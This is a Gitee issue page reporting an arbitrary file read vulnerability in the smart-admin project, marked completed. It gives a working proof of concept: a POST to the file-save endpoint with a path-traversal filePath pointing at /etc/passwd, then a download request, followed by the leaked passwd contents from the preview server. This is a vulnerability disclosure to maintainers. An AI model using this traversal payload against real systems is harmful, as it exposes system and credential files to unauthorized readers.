629 Star 6.3K Fork 2.7K

1024创新实验室 / smart-admin

 / 详情

Arbitrary File Read

已完成
创建于  
2020-12-28 17:52
POST /smart-admin-api/api/file/save HTTP/1.1
Host: preview.smartadmin.1024lab.net
x-access-token: <ur_token>
Content-Type: application/json
Origin: http://preview.smartadmin.1024lab.net

{"moduleId":1,"moduleType":1,"fileLocationType":1,"fileName":"poc.png","filePath":"/../../../../../../../../etc/passwd"}
http://preview.smartadmin.1024lab.net/smart-admin-api/api/file/downLoad?id=<swap_in_file_id_retrieved_above>
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin

评论 (1)

Syne 创建了任务
Syne 关联仓库设置为1024-lab/smart-admin
Syne 修改了描述
展开全部操作日志

A further test suggests no authentication required.

1024创新实验室 任务状态待办的 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
JavaScript
1
https://gitee.com/lab1024/smart-admin.git
git@gitee.com:lab1024/smart-admin.git
lab1024
smart-admin
smart-admin

搜索帮助